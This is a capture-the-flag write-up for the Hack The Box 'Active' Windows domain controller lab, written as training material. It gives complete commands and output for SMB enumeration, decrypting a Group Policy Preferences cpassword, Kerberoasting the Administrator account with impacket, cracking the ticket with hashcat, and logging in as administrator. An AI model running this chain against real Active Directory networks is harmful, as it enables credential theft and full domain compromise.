HTB:Active Write-Up
Target Machine Information:
· Hostname : ACTIVE
· IP Address : 10.10.10.100
· OS : Windows
RECON:
sudo bash nmapAutomator 10.10.10.100 Basic# Nmap 7.91 scan initiated Tue May 11 17:21:47 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.100.nmap --dns-server=1.1.1.1 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.069s latency).PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-11 21:23:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 1m51s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-11T21:24:43
|_ start_date: 2021-05-11T20:50:52Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 11 17:22:59 2021 -- 1 IP address (1 host up) scanned in 72.54 seconds
ENUMERATION:
enum4linux -a 10.10.10.100
sudo smbclient //10.10.10.100/Replication -U ""%""
After login we navigate to the following directory and get the Groups.xml file
smb: \> cd active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
We then go back to our attack machine to view the Groups.xml file. In the file we get a hash where it says “cpassword”
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
After pasting it into Google we see that we can decrypt it using gpp-decrypt.
┌──(kali㉿kali)-[~/Desktop/nmapAutomator/10.10.10.100]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
And we get the following output → GPPstillStandingStrong2k18
Also in our Groups.xml file we can see that the user is “SVC_TGS”
So with these credentials lets try and use smbmap to see what we have access to.
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
We can then use smbclient to login and navigate to find our user.txt
smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
get user.txt┌──(root💀kali)-[~]
└─# cat user.txt
86d67d....
PRIVILEGE ESCALATION:
Since we saw that port 88 is running kerberos we can go ahead and try to find a kerberos ticket of the Admin and crack it to find our admin credentials.
- Grab “GetUserSPN.py” from the impacket directory and paste it somewhere you can use it.
locate GetUserSPN.pycp ../../GetUserSPN.py .
2. Now let run it.
python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPN.out
3. We get a hash
┌──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat GetUserSPN.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$54a8d2b2ecc2b0e7133a4859603299ca$4b3c7d8d46c5de380060e507672863e4c52768b06445d906c989746c74a32ee25fd9dd3afb3817e14db22be2aca654ee4e6b929a8b1e273208c0079b53aab280710659c3eb3e63c6e4f6733015287734a15a90e96a267b6ab2d642881d45b396c9ccfc7a207cbe4b2f2df98174b2b76984e885ce87cdbbeeb3642e01fd363c499d67c461e2d6a1b1743e533f5788bd69f726f4a8e7c22f3f2ce786212abff34685ea09192daf36d6fd05992aa158470c3d53fa7835ce22a90ea8a2fe044fe4ce7c7c19692cb25f58aa1aeb8af0859960f2d9c34bb0c7acc9aadb1d0790cb67c339dca5e3ab2bc902fa5f50424a2b67d2f499971f179c1076b9b531bdead3b2fdfddc2f57693a4105a8f3643cd68c1182f39a0a94fc0992dafd203d7aa516cfe50915d75753690e2b27fc5325c549559c727dc682fb34031bb5d98a88623cf9c04b6cff9339cf5ceb64bd49ba33efd47c0a9557f72f632d5d322e9ecdc3cc69637063f672621e895861ef079b698b26304cb5ad0826ee30a8186b4158b08113c209a6a9b0ce2048a644c03be6158607f2eb767f4b06d095d3528b141d709d051678f446718b4a85614b3cb5d6adb87769bc438b4c44d10368016d23b4a106423c5a27b458967f917e42c3804171d4294734ecb537024e930030fdf8e54a8c00bf650fd26160a20887c38422051fcfbb5ca03b60a85d9a17b6a9d12a151e700b93e2f574eea7f1a9e26b5b0298a9fd8262ec35abb33d4935d1457745ac1a4461f3bef9441265c6532f7f0ab79b752efa85f78fb475522d0c3320aa0880d76027faf92623863bfe0389f880c2ca03ea3dbe191cff5b4cf5a4ca9ae1ee05f1700e63ea5b2dd758943d49ced44ef5ae55ac99cac7ea864d956d8e63ab695b6e76eb0d4762999ec138a5faffe82ec36fdf46043571317fd25edcf354d1b2b4b4c2ea5fa83c831b6f4aeb3573beff7858ef66c59e81d19bc742a95a03af12ec71f2e9e7883a79ba47870c76801b4a6287d8ec3b862f8623d87e3e1d211eedacaaf5cc0658768057bb48438ee06768a2992fd886d39c92e142421ec6ac927a1bd22b7bf19a1b2430d4991a17dc29a3e47124ea8dbb44c2254219db75ee7fea6d9d99ba5d3945ec67a255a6600eebdd1ae280887057903153ff09e018d315de0e90b2f565ad8449ecc17fe364f139ddd8a3f5673035e445ac3cfe573ba5406d5dd476da1bddbd35e47654acc81910dacbfcd9cfaec0f177c54d788b2c5d31
4. After some googling we find that in a kerberoasting attack the hash is
→13100 | Kerberos 5, etype 23, TGS-REP ←
5. So our attack will be formatted like the following.
hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O
We get our cracked hash
hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O --show...c5d31:Ticketmaster1968
6. So now let’s locate and copy smbclient and try and login as admin
cp /opt/impacket/examples/smbclient.py .python3 smbclient.py Administrator:Ticketmaster1968@10.10.10.100Impacket v0.9.23.dev1+20210127.141011.3673c588 - Copyright 2020 SecureAuth CorporationType help for list of commands# use Users
# ls
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 .
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 ..
drw-rw-rw- 0 Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Default
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw- 174 Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Public
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
# cd Administrator
# cd Desktop
# get root.txt
# exit──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat root.txt
b5fc76d1...
Rooted and scooted!